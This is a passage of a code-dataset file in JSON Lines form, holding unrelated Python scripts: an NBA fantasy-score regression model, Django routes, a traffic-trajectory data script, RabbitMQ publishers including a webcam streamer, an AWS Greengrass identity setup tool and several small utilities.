sm.ols(formula=f\"TTFL~{'+'.join(_fields_for_ttfl_estim)}\",\r\n data=clusters).fit().predict(clusters)\r\n # Regroupement pas Poste et Adversaire\r\n clusters = clusters.groupby(by=[\"Poste\", \"Adversaire\"]).mean([\"Diff\"])[\"Diff\"].reset_index()\r\n\r\n # Analyse du nombre de cluster optimal\r\n # sum_of_squared_distances = []\r\n # nb_clusters = range(1, 15)\r\n # for k in nb_clusters:\r\n # km4 = KMeans(n_clusters=k)\r\n # km = km4.fit(np.array(nba_stat_cluster_moyen).reshape(-1, 1))\r\n # sum_of_squared_distances.append(km.inertia_)\r\n\r\n # plt.plot(nb_clusters, sum_of_squared_distances, 'bx-')\r\n # plt.xlabel('k')\r\n # plt.ylabel('Sum of squared distances')\r\n # plt.title('Elbow Method For Optimal k')\r\n # plt.show()\r\n\r\n clusters[\"Cluster\"] = KMeans(n_clusters=_kmeans).fit_predict(\r\n np.array(clusters[\"Diff\"]).reshape(-1, 1)).astype(str)\r\n\r\n if _num:\r\n clusters[\"Cluster\"] = clusters[\"Cluster\"].apply(\r\n lambda x: clusters['Diff'][clusters['Cluster'] == x].mean())\r\n else:\r\n clusters[\"Cluster\"] = clusters[\"Cluster\"].apply(lambda x: f\"C{str(x)}\")\r\n return clusters.drop(\"Diff\", axis=1)\r\n\r\n\r\ndef get_mat_ttfl_predict(_data: pd.DataFrame, _calendar: pd.DataFrame, _clusters: pd.DataFrame,\r\n _model: Callable or str, _fields_for_ttfl_estim: dict) \\\r\n -> tuple[pd.DataFrame, pd.DataFrame]:\r\n \"\"\"\r\n Cette fonction permet de renvoyer la matrice contenant les prédictions du score TTFL en fonction d'une certaine\r\n méthode de calcul et d'une formule de prédiction.\r\n\r\n Parameters\r\n ----------\r\n _data: pd.DataFrame\r\n Le DataFrame contenant les données des joueurs.\r\n _calendar: pd.DataFrame\r\n Le calendrier à venir sous forme de DataFrame.\r\n _clusters: pd.DataFrame\r\n Les clusters en fonction du poste et de l'adversaire\r\n _model: Callable or str\r\n La fonction contenant le type de modèle à utiliser. 
\r\n Si Callable, utilisation de la fonction, si str chargement du pickle\r\n _fields_for_ttfl_estim: dict\r\n Le dictionnaire qui possède comme clé l'ensemble des variables à utiliser pour modéliser TTFL.\r\n Les valeurs associées sont les noms des champs à utiliser dans _data pour chacune des variables.\r\n Si une variable ne se situe pas dans _data, alors utiliser None comme valeur.\r\n\r\n Return\r\n ------\r\n clusters: pd.DataFrame\r\n Le DataFrame contenant la matrice Joueur x Date avec les prédictions associées\r\n \"\"\"\r\n # Calcul du model\r\n if isinstance(_model, str):\r\n reg = pickle.load(open(_model, 'rb'))\r\n if VERBOSE:\r\n print(f\"Modèle utilisé : TTFL~{'+'.join(_fields_for_ttfl_estim.keys())}\")\r\n print(\r\n f\"RMSE regression avec Clustering : {np.sqrt(np.mean((_data['TTFL'] - reg.predict(_data)) ** 2))}\")\r\n print(\r\n f\"MAE regression avec Clustering : {mean_absolute_error(_data['TTFL'][~reg.predict(_data).isna()], reg.predict(_data)[~reg.predict(_data).isna()])}\")\r\n print(reg.summary())\r\n\r\n else:\r\n reg = _model(formula=f\"TTFL~{'+'.join(_fields_for_ttfl_estim.keys())}\", data=_data).fit()\r\n if VERBOSE:\r\n print(f\"Modèle utilisé : TTFL~{'+'.join(_fields_for_ttfl_estim.keys())}\")\r\n print(\r\n f\"RMSE regression avec Clustering : {np.sqrt(np.mean((_data['TTFL'] - reg.predict(_data)) ** 2))}\")\r\n print(\r\n f\"MAE regression avec Clustering : {mean_absolute_error(_data['TTFL'], reg.predict(_data))}\")\r\n print(reg.summary())\r\n\r\n # Sélection des colonnes\r\n cols_to_keep = [\"ID\", \"Equipe\", \"Poste\"]\r\n cols_to_keep.extend([x for x in _fields_for_ttfl_estim.values() if x is not None])\r\n last_nba_stat = _data.sort_values([\"ID\", \"Date\"]).groupby(\"ID\").last().reset_index()[\r\n cols_to_keep]\r\n\r\n # Prédiction des matchs\r\n base_predict = pd.concat([\r\n _calendar.rename(columns={\"Dom\": \"Equipe\", 'Ext': 'Adversaire'}).merge(\r\n last_nba_stat, \"left\", on=\"Equipe\").assign(Lieu_DOM=1),\r\n _calendar.rename(columns={\"Ext\": \"Equipe\", 'Dom': 'Adversaire'}).merge(\r\n last_nba_stat, \"left\", on=\"Equipe\").assign(Lieu_DOM=0)\r\n ]).merge(_clusters, 'left', on=['Adversaire', 'Poste']).set_index(\"ID\").rename(\r\n columns={v: k for k, v in _fields_for_ttfl_estim.items() if v is not None})\r\n base_predict = base_predict.reset_index()\r\n base_predict[\"Pred\"] = reg.predict(base_predict)\r\n base_predict = base_predict.set_index(\"ID\")\r\n base_impact = base_predict.copy()\r\n base_impact['Impact adversaire'] = base_impact['Cluster'] * reg.params['Cluster']\r\n base_impact['Impact forme'] = base_impact[\r\n \"TTFL\" + str(NB_DAYS_AVG) + \"jover\" + str(SEASON_AVG)] * \\\r\n reg.params[\"TTFL\" + str(NB_DAYS_AVG) + \"jover\" + str(SEASON_AVG)]\r\n base_impact['Impact domicile'] = base_impact['Lieu_DOM'] * reg.params['Lieu_DOM']\r\n return (\r\n base_predict.reset_index().pivot_table(values=\"Pred\", index=\"ID\", columns=\"Date\",\r\n fill_value=0),\r\n base_impact\r\n )\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"496986373","text":"from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^orders/settlement/$', views.OrdersSettle.as_view(), name='settlement'),\n url(r'^orders/commit/$', views.OrdersCommit.as_view(), name='commit'),\n url(r'^orders/success/$', views.OrdersSuccess.as_view(), name='success'),\n url(r'^orders/comment/$', views.CommentView.as_view(), name='comment'),\n url(r'^comments/(?P\\d+)/$', views.GoodsComment.as_view(), name='goodscomment'),\n\n]\n","sub_path":"meiduomall/meiduomall/apps/orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"604457771","text":"# import numpy as np\r\n# import pandas as pd\r\n# from pandas import Series\r\n# from pandas import DataFrame\r\n#\r\n#\r\n# data=pd.read_csv(r'D:\\python视频\\trajectories-0750am-0805am_steer.csv',nrows=6000)\r\n# frame=DataFrame(data)\r\n# index=frame.index\r\n# movement=[]\r\n# frame_add=DataFrame(np.zeros((5000,4)).astype(np.float),index=np.arange(5000),columns=[ 'front_v_Vel','front_v_Acc',\\\r\n# 'behind_v_Vel','behind_v_Acc'])\r\n#\r\n# # pd.set_option('display.max_columns', None)\r\n# # pd.set_option('display.max_rows', None)\r\n# #转换为numpy数组\r\n# #获取车辆当前车道位置\r\n# lane_id=frame.loc[:,'Lane_ID']\r\n# lane_id=np.array(list(lane_id))\r\n# #获取帧标识号\r\n# frame_id=frame.loc[:,'Frame_ID']\r\n# frame_id=np.array(list(frame_id))\r\n# #获取车辆识别号\r\n# vehicle_id=frame.loc[:,'Vehicle_ID']\r\n# vehicle_id=np.array(list(vehicle_id))\r\n#\r\n# #遍历赋值\r\n# for i in range(5000):\r\n# #第一问 移动状态\r\n# if lane_id[i]==lane_id[i+1]:\r\n# movement.append('TH')\r\n# elif lane_id[i]>lane_id[i+1]:\r\n# movement.append('LT')\r\n# else:\r\n# movement.append('RT')\r\n# #第二问:前后车速度和及速度\r\n# if frame.loc[i,'Preceding']!=0:\r\n# #如果前方有车 获取前方车辆id 和当前帧数\r\n# front_id=frame.loc[i,'Preceding']\r\n# local_time=frame.loc[i,'Frame_ID']\r\n# bo1 = (vehicle_id == front_id)\r\n# bo2 = (frame_id == local_time)\r\n# print(bo1.sum())\r\n# print(bo2.sum())\r\n# arr = np.where(bo2 & bo1, frame.loc[i,'v_Vel'], 0)\r\n# frame_add.loc[i,'front_v_Vel']=arr.sum()\r\n# arr = np.where(bo2 & bo1, frame.loc[i,'v_Acc'], 0)\r\n# frame_add.loc[i, 'front_v_Acc'] = arr.sum()\r\n# else:\r\n# pass\r\n# # 如果后方有车 获取后方车辆id 和当前帧数\r\n# behind_id = frame.loc[i, 'Vehicle_ID']\r\n# local_time = frame.loc[i, 'Frame_ID']\r\n# bo1 = (vehicle_id == behind_id)\r\n# bo2 = (frame_id == local_time)\r\n# arr = np.where(bo2 & bo1, frame.loc[i,'v_Vel'], 0)\r\n# frame_add.loc[i, 'behind_v_Vel'] = arr.sum()\r\n# arr = np.where(bo2 & bo1, frame.loc[i,'v_Acc'], 0)\r\n# frame_add.loc[i, 'behind_v_Acc'] = arr.sum()\r\n#\r\n# #合并写入新文件\r\n# frame_add.insert(0,'movement',np.array(movement))\r\n# df=pd.concat([frame,frame_add],axis=1)\r\n# df.to_csv(r'D:\\python视频\\add.csv')\r\n# print(df)\r\n#\r\n#\r\n#\r\n\r\n\r\nimport pandas as pd\r\ndata=pd.read_csv(r'D:\\python视频\\trajectories-0750am-0805am_steer.csv')\r\n#print(data.head)\r\n#print(data.shape)\r\nvehicle_id=data['Vehicle_ID']\r\nlane_id=data['Lane_ID']\r\n# for i in range(4999):\r\n# if vehicle_id[i]==vehicle_id[i+1]:\r\n# if lane_id[i]==lane_id[i+1]:\r\n# data.loc[i,'Movement']=1\r\n# elif lane_id[i]>lane_id[i+1]:\r\n# data.loc[i,'Movement']=2\r\n# else:\r\n# data.loc[i,'Movement']=3\r\n# else:\r\n# data.loc[i, 'Movement'] = 1\r\n# data.to_csv(r'D:\\python视频\\movement.csv')\r\n\r\nfor i in range(5000):\r\n pre_id=data.loc[i,'Preceding']\r\n frame_id=data.loc[i,'Frame_ID']\r\n if pre_id!=0:\r\n #布尔索引\r\n 
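# --- Illustrative sketch (not part of the original file) ---
# The row-by-row lookup above (find the preceding vehicle within the same
# frame) can usually be vectorised with a self-merge on (Preceding, Frame_ID)
# against (Vehicle_ID, Frame_ID); a sketch under that assumption:
import pandas as pd

data = pd.DataFrame({'Vehicle_ID': [1, 2], 'Frame_ID': [10, 10],
                     'Preceding': [0, 1], 'v_Vel': [30.0, 28.0], 'v_Acc': [0.1, -0.2]})
leaders = data[['Vehicle_ID', 'Frame_ID', 'v_Vel', 'v_Acc']].rename(
    columns={'Vehicle_ID': 'Preceding', 'v_Vel': 'Pre_v_Vel', 'v_Acc': 'Pre_V_Acc'})
merged = data.merge(leaders, how='left', on=['Preceding', 'Frame_ID'])
print(merged[['Vehicle_ID', 'Pre_v_Vel', 'Pre_V_Acc']])  # vehicle 2 inherits 30.0 / 0.1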
data_temp=data[(data['Vehicle_ID']==pre_id)&(data['Frame_ID']==frame_id)]\r\n if len(data_temp)!=0:\r\n data.loc[i,'Pre_v_Vel']=data_temp.loc[data_temp.index[0],'v_Vel']\r\n data.loc[i,'Pre_V_Acc']=data_temp.loc[data_temp.index[0],'v_Acc']\r\n data.loc[data_temp.index[0],'Back_v_Vel']=data.loc[i,'v_Vel']\r\n data.loc[data_temp.index[0], 'Back_v_Acc'] = data.loc[i,'v_Acc']\r\ndata.to_csv(r'D:\\python视频\\ac.csv')","sub_path":"20200322_作业.py","file_name":"20200322_作业.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"186037840","text":"from marshmallow_sqlalchemy import SQLAlchemySchema, auto_field, SQLAlchemyAutoSchema\nfrom sqlalchemy.orm import session\n\nfrom DirFile.DBGlaobal.context import DbSessionFactory\nfrom DirFile.Model.playerPoints import Point\nfrom DirFile.Model.players import Player\nfrom sqlalchemy.orm import scoped_session, sessionmaker, relationship, backref, session\n\n\nclass PointSchema(SQLAlchemySchema):\n class Meta:\n model = Point\n load_instance = True\n poitId = auto_field()\n score = auto_field()\n gameName = auto_field()\n created = auto_field()\n isPlayed = auto_field()\n\n\nclass PlayerSchema(SQLAlchemySchema):\n class Meta:\n model = Player\n load_instance = True\n id = auto_field()\n username = auto_field()\n password = auto_field()\n print(username)\n\n\n# session = DbSessionFactory.create_session()\n#\n# # Desiralization\n# player = Player(username=\"Said H F\")\n# player_schema = PlayerSchema()\n# point = Point(gameName=\"JustPlay\")\n# session.add(point)\n# session.add(player)\n# session.commit()\n# dump_data = player_schema.dump(player)\n# print(dump_data)\n","sub_path":"DirFile/SerialMash/mashallin.py","file_name":"mashallin.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"423677581","text":"#!/usr/bin/env python\nimport os\nimport pika\nimport logging\nfrom logging.config import dictConfig\nfrom rabbit_python import config\n\n\ndef main():\n logging.info(\"main\")\n logging.info(\"connecting to rabbit\")\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(host=config.host, port=config.port)\n )\n\n channel = connection.channel()\n\n channel.queue_declare(queue=\"hello\")\n\n channel.basic_publish(exchange=\"\", routing_key=\"hello\", body=\"Hello World!\")\n logging.info(\" [x] Sent 'Hello World!'\")\n connection.close()\n\n\nif __name__ == \"__main__\":\n os.makedirs(config.logging_dir, exist_ok=True)\n dictConfig(config.logging_config_dict)\n main()\n","sub_path":"src/hello/send/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460320924","text":"# -*- coding: utf-8 -*-\n#-----------------------------------------------------------------------------\n# Copyright (c) 2012, Techunits\n#\n# Distributed under the terms of the MIT License\n#-----------------------------------------------------------------------------\n\nimport logging\nimport urllib\nimport urllib2\nimport json\n\nfrom mahs.exception import *\n#from lxml import etree\n\nlog = logging.getLogger('mahs')\n\nclass MaHSAPI(object):\n \n def __init__(self, apiKey, apiSecretKey):\n self.currentUserAgent = 'MaHS-Python-Client-1.0.1'\n apiUrl = 'http://api.mongolantern.techunits.com'\n \n if not apiUrl:\n raise MaHSInitializationError('API URL not specified.')\n 
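# --- Illustrative sketch (not part of the original file) ---
# The send() script above publishes to the 'hello' queue; the matching consumer
# (assuming the same broker settings and the pika 1.x API) looks like this:
import pika

def on_message(ch, method, properties, body):
    print(f" [x] Received {body!r}")

connection = pika.BlockingConnection(pika.ConnectionParameters(host="localhost"))
channel = connection.channel()
channel.queue_declare(queue="hello")
channel.basic_consume(queue="hello", on_message_callback=on_message, auto_ack=True)
channel.start_consuming()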
else:\n self.apiUrl = apiUrl\n\n if not apiKey:\n raise MaHSInitializationError('API Key not specified.')\n else:\n self.apiKey = apiKey\n\n if not apiSecretKey:\n raise MaHSInitializationError('Secret Key not specified.')\n else:\n self.apiSecretKey = apiSecretKey\n\n\n # show curent object for debug purposes\n def printObjectDebugInfo(self):\n print(self)\n quit()\n \n \n def setQuery(self, queryObject):\n self.apiUrl += '/query'\n self.queryObject = queryObject\n \n \n def executeCall(self):\n if self.queryObject is not None:\n httpGetData = urllib.urlencode({\n 'apiKey': self.apiKey,\n 'apiSecret': self.apiSecretKey,\n 'indexBase': self.queryObject.searchIndex,\n 'keyword': self.queryObject.keyword,\n 'sortMode': self.queryObject.sortMode,\n 'matchMode': self.queryObject.matchMode,\n })\n httpHeaders = {\n 'User-Agent' : self.currentUserAgent\n }\n self.apiUrl += '?'+httpGetData\n requestObject = urllib2.Request(self.apiUrl, None, httpHeaders)\n try:\n response = urllib2.urlopen(requestObject)\n responseObj = json.loads(response.read())\n return responseObj;\n except urllib2.HTTPError as e:\n print('Invalid API url. HTTP Error code: ' + str(e.code))\n \n \n else:\n raise MaHSRequestError('Missing QueryObject. Not yet implemented')\n \n \n \n \n \n \n\n","sub_path":"mahs/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"28201469","text":"#!/usr/bin/env python3\n\nimport sys\n\ninputDiff = sys.argv[1]\noutputDiff = sys.argv[2]\n\n#with open(\"OMG_OntoIOp_current-diff2e94c79.tex\", \"r\") as readDiff:\nwith open(inputDiff, \"r\") as readDiff:\n \n# with open(\"OMG_diff.tex\", \"w\") as writeDiff:\n with open(outputDiff, \"w\") as writeDiff:\n begin_listing = r\"\\begin{lstlisting}\"\n end_listing = \"\\end{lstlisting}\"\n\n begin_delete = \"\\DIFdelbegin\"\n end_delete = \"\\DIFdelend\" \n\n begin_add = \"\\DIFaddbegin\"\n end_add = \"\\DIFaddend\"\n\n begin_listing_flag = \"false\"\n end_listing_flag = \"false\"\n \n# begin_delete_count = 0\n# end_delete_count = 0\n\n# begin_add_count = 0\n# end_add_count = 0\n\n exist_escape_1 = \"escapeinside={()}\"\n exist_escape_2 = \"escapeinside={<>}\"\n \n escape_strings = '''\\lstset{escapeinside = {*@}{@*}}\n''' \n\n for line in readDiff:\n if begin_listing in line: # search \\begin{lstlisting}\n begin_listing_flag = \"true\" # note the start of lstlisting\n end_listing_flag = \"false\" # \\end{lstlisting} not reached \n if exist_escape_1 in line:\n first_escape = \" ( \"\n second_escape = \" ) \"\n elif exist_escape_2 in line:\n first_escape = \" < \"\n second_escape = \" > \"\n else:\n first_escape = \" *@ \"\n second_escape = \" @* \"\n line = line.replace(line, escape_strings + line) # set escape string to escape to latex \n if end_listing in line: # search \\end{lstlisting}\n end_listing_flag = \"true\" # end of \\begin{lstlisting} is reached \n begin_listing_flag = \"false\" # note the finish of lstlisting\n if begin_listing_flag == \"true\" and end_listing_flag == \"false\" and begin_delete in line: # search \\DIFdelbegin in the line \n line = line.replace(begin_delete, first_escape + begin_delete) # add escape string to escape to latex to execute \\DIFdel\n# begin_delete_count = begin_delete_count + 1 \n if begin_listing_flag == \"true\" and end_listing_flag == \"false\" and end_delete in line: # search \\DIFdelend in the line \n line = line.replace(end_delete, end_delete + second_escape) # add escape string to 
return to the lstlisting environment\n# end_delete_count = end_delete_count + 1 \n if begin_listing_flag == \"true\" and end_listing_flag == \"false\" and begin_add in line: # search \\DIFaddbegin in the line \n line = line.replace(begin_add, first_escape + begin_add) # add escape string to escape to latex to execute \\DIFadd\n# begin_add_count = begin_add_count + 1 \n if begin_listing_flag == \"true\" and end_listing_flag == \"false\" and end_add in line: # search \\DIFaddend in the line\n line = line.replace(end_add, end_add + second_escape) # add escape string to return to the lstlisting environment\n# end_add_count = end_add_count + 1 \n\n writeDiff.write(line)\n\n#print begin_delete_count\n#print end_delete_count\n#print begin_add_count\n#print end_add_count\n\n\n \nreadDiff.close()\nwriteDiff.close()\n\n\n\n\n#\\lstset{\n# escapeinside={(*@}{@*)}, \n#}\n\n\n\n \n","sub_path":"Standard/listing_highlight.py","file_name":"listing_highlight.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"102359096","text":"#another example - map\n\n#a function that checks whether the lenght of a name is even or odd\ndef name_check(name):\n if len(name)%2 == 0:\n print(\"EVEN\")\n else:\n print(\"ODD\")\n \n# a list of names\npeople = [\"Joseph\",\"Faith\",\"Michael\",\"Muhammed\",\"Sandra\",\"Israel\",\"Victor\"]\n\n#using a for loop to return the result\nfor x in map(name_check,people):\n print(x)\n","sub_path":"map_2.py","file_name":"map_2.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"154825988","text":"#!/usr/bin/env python3\n\n\"\"\"\nCreated on 09 Oct 2020\n\n@author: Jade Page (jade.page@southcoastscience.com)\n\nsource repo: scs_mfr\n\nDESCRIPTION\nThe aws_identity script allows the user to change the identity of an already-configured greengrass install,\nin our use case it is to change the greengrass identity of a device which was set up using a cloned\nbase image without having to reinstall the greengrass software\n\nThe script could also be used to set up a \"blank\" greengrass install, which does not already have an identity, but\ndoes already have the greengrass software.\n\nIf no group name is provided, the host name will be read from the device.\nIf no core name is provided, the host name will be read from the device.\n\nSYNOPSIS\naws_identity.py [-s [-g GROUP_NAME] [-c CORE_NAME]] [-i INDENT] [-v]\n\nEXAMPLES\n./aws_identity.py -s -g scs-test-003-group -c scs-test-003-core -v\n\nDOCUMENT EXAMPLE\n{\"core-name\": \"scs-cube-001-core\", \"group-name\": \"scs-cube-001-group\"}\n\nSEE ALSO\nscs_mfr/aws_deployment\nscs_mfr/aws_group_setup\n\nRESOURCES\nCreated with reference to amazon's own device setup script (URL may change if updated)\nhttps://d1onfpft10uf5o.cloudfront.net/greengrass-device-setup/downloads/gg-device-setup-latest.sh\nhttps://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/iot.html\nhttps://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/greengrass.html\n\nNOTES\nATS_ROOT_CA_RSA_2048_REMOTE_LOCATION in core.aws.greengrass aws_identity is a certificate provided by\namazon itself and may be subject to change e.g. 
via obsolescence - check here:\nhttps://docs.aws.amazon.com/iot/latest/developerguide/server-authentication.html\n\"\"\"\n\nimport os\nimport sys\n\nfrom botocore.exceptions import NoCredentialsError, ClientError\n\nfrom scs_core.aws.client.client import Client\nfrom scs_core.aws.config.aws import AWS\nfrom scs_core.aws.greengrass.aws_identity import AWSIdentity\n\nfrom scs_core.aws.security.access_key_manager import AccessKeyManager\nfrom scs_core.aws.security.cognito_device import CognitoDeviceCredentials\nfrom scs_core.aws.security.cognito_login_manager import CognitoLoginManager\n\nfrom scs_core.data.json import JSONify\n\nfrom scs_core.sys.logging import Logging\n\nfrom scs_host.sys.host import Host\n\nfrom scs_mfr.cmd.cmd_aws_identity import CmdAWSIdentity\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\n key = None\n\n # ----------------------------------------------------------------------------------------------------------------\n # cmd...\n\n cmd = CmdAWSIdentity()\n\n if not cmd.is_valid():\n cmd.print_help(sys.stderr)\n exit(2)\n\n # logging...\n Logging.config('aws_identity', verbose=cmd.verbose)\n logger = Logging.getLogger()\n\n logger.info(cmd)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # validation...\n\n if cmd.setup and os.geteuid() != 0:\n logger.error(\"you must have root privileges to set the identity.\")\n exit(1)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # authentication...\n\n if cmd.setup:\n # credentials...\n credentials = CognitoDeviceCredentials.load_credentials_for_device(Host)\n\n # AccessKey...\n gatekeeper = CognitoLoginManager()\n auth = gatekeeper.device_login(credentials)\n\n if not auth.is_ok():\n logger.error(auth.authentication_status.description)\n exit(1)\n\n manager = AccessKeyManager()\n key = manager.get(auth.id_token)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # run...\n\n try:\n if cmd.setup:\n iot_client = Client.construct('iot', key)\n gg_client = Client.construct('greengrass', key)\n\n identity = AWSIdentity(iot_client, gg_client, AWS.core_name(), AWS.group_name())\n identity.setup_device()\n identity.save(Host)\n\n else:\n identity = AWSIdentity.load(Host)\n\n if identity:\n print(JSONify.dumps(identity, indent=cmd.indent))\n\n except KeyboardInterrupt:\n print(file=sys.stderr)\n\n except ClientError as error:\n if error.response['Error']['Code'] == 'ResourceAlreadyExistsException':\n logger.error(\"the resources for this group already exist.\")\n\n except (EOFError, NoCredentialsError):\n logger.error(\"credentials error.\")\n","sub_path":"src/scs_mfr/aws_identity.py","file_name":"aws_identity.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609138655","text":"from setuptools import setup, find_packages\nimport os\n\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(current_dir, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name = 'LRT-util',\n version = '0.0.13',\n description = 'Use libRadtran to calculate radiative properties, e.g., radiance, irradiance etc.',\n long_description = long_description,\n classifiers = [\n 
'Development Status :: 2 - Pre-Alpha',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Atmospheric Science',\n ],\n keywords = 'libRadtran radiation model RTM',\n url = 'https://github.com/hong-chen/libradtran-util',\n author = 'Hong Chen',\n author_email = 'me@hongchen.cz',\n license = 'MIT',\n packages = find_packages(),\n install_requires = ['nose', 'numpy', 'scipy'],\n python_requires = '~=3.6',\n include_package_data = True,\n zip_safe = False\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"479779230","text":"import pika\n\nimport cv2\nimport pygame.camera\nimport pygame.image\n\nimport zipfile\nimport json\nfrom datetime import datetime\nimport base64\nimport time\nimport os\nimport sys\nimport queue\nimport threading\nimport psutil\nfrom persistqueue import Queue\n\naddressIp='62.244.197.146'\n# addressIp='192.168.116.20'\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(addressIp,5550))\nchannel = connection.channel()\nqueueName='camlivetest'\nchannel.queue_declare(queue=queueName)\n\nmax_que_size=100\nqueueFrame=Queue(\"/mnt/sd/test\") \n#queueFrame=queue.LifoQueue(100)\nis_exit=False\n\n\nclass CamFrameClass:\n def __init__(self, time, image):\n self.time = time\n self.image = image\n\n\n\n\ndef capture(*args):\n cap = cv2.VideoCapture(1)\n print(\"Width: %d, Height: %d, FPS: %d\" % (cap.get(3), cap.get(4), cap.get(5)))\n while not is_exit:\n _startTime=time.time()\n time.sleep(0.01)\n if psutil.virtual_memory()[2]>90 or queueFrame.qsize()>max_que_size: #queueFrame.qsize()>max_que_size: #queueFrame.full() or\n print('queue/memory is full')\n queueFrame.get()\n queueFrame.task_done()\n # sys.exit()\n \n\n ret, frame = cap.read()\n\n if ret != True:\n time.sleep(0.1)\n continue\n\n queueFrame.put(frame)\n\n cap.release()\n\n\n\nif __name__ == '__main__':\n print('start')\n p = []\n \n p.append(threading.Thread(target=capture, args=(1,)))\n p[0].start()\n\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 70]\n \n\n while not is_exit:\n if queueFrame.empty():\n time.sleep(0.1)\n frame=queueFrame.get()\n result, encimg = cv2.imencode('.jpg', frame, encode_param)\n imgSize = sys.getsizeof(encimg)\n cv2.imshow('frame',frame)\n print(queueFrame.qsize())\n # print(psutil.virtual_memory()) # physical memory usage\n print('memory % used:', psutil.virtual_memory()[2])\n time.sleep(1)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n\n\n \n\n\n\n\n\ndef tmp():\n # cap = cv2.VideoCapture(1)\n # vidPath=\"/home/cc/video/k1.avi\"\n cap = cv2.VideoCapture(1)\n\n # cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1280);\n # cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720);\n # cap.set(cv2.CV_CAP_PROP_FPS, 5)\n\n # cap.set(cv2.CAP_PROP_FPS,5)\n # stream.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, 1920);\n # stream.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, 1080);\n # stream.set(cv2.cv.CV_CAP_PROP_FPS, 5)\n\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 70]\n averageFps = 0\n frameCount=0\n startTime=time.time()\n # cachePath=\"~/code/men/cache/aa.jpg\"\n while True:\n\n try:\n (g,frame) = cap.read()\n # height, width, depth = frame.shape\n if frame is None:\n break\n if not cap.isOpened():\n break\n\n # width,height = cap.get(cv2.CAP_PROP_FRAME_WIDTH),cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n # print(str(width) + \" \" + str(height))\n\n\n # half = cv2.resize(frame, (1280, 720))\n # 
result, encimg = cv2.imencode('.jpg', frame, encode_param)\n # size = str(sys.getsizeof(data))\n # cv2.imwrite(cachePath,half,encode_param)\n # img = cv2.imread(cachePath)\n # imgSize=os.path.getsize(cachePath)\n # os.remove(cachePath)\n # height, width = img.shape[:2]\n # print(str(width) + \" \" + str(height) + \" \" + str(imgSize/1024) + \" KB\")\n\n # half = cv2.resize(frame, (640, 480))\n result, encimg = cv2.imencode('.jpg', frame, encode_param)\n imgSize = sys.getsizeof(encimg)\n # height, width = half.shape[:2]\n # print(str(width) + \" \" + str(height) + \" \" + str(imgSize / 1024) + \" KB\")\n\n # imgnp = bytearray(encimg)\n\n\n encoded_string = str(base64.b64encode(encimg))\n # imgSize = sys.getsizeof(encoded_string)\n\n now = datetime.now().isoformat()\n camClass = CamFrameClass(now, encoded_string)\n\n jsonStr = json.dumps(camClass.__dict__)\n # print('sending:'+now )\n # + \" \" + str(width) + \"X\" + str(height)\n\n _startTime=time.time()\n channel.basic_publish(exchange='', routing_key=queueName, body=jsonStr)\n frameCount=frameCount+1\n _diffTime=time.time()-_startTime\n waitTime = 0.1-_diffTime\n if waitTime>0:\n time.sleep(waitTime)\n\n diffTime = time.time() - startTime\n\n if diffTime >=5:\n fps=frameCount/5\n print(\"fps:\" + str(fps) + \" - \" + str(imgSize / 1024))\n startTime = time.time()\n frameCount=0\n\n\n except KeyboardInterrupt:\n # print('hata')\n # break the infinite loop\n break\n\n\n cv2.destroyAllWindows()\n connection.close()\n exit()\n\n\n\n\n\n","sub_path":"mayaclient/rmq1.py","file_name":"rmq1.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"344036719","text":"# Copyright 2016 - Nokia Networks\n# Copyright 2016 - Brocade Communications Systems, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF 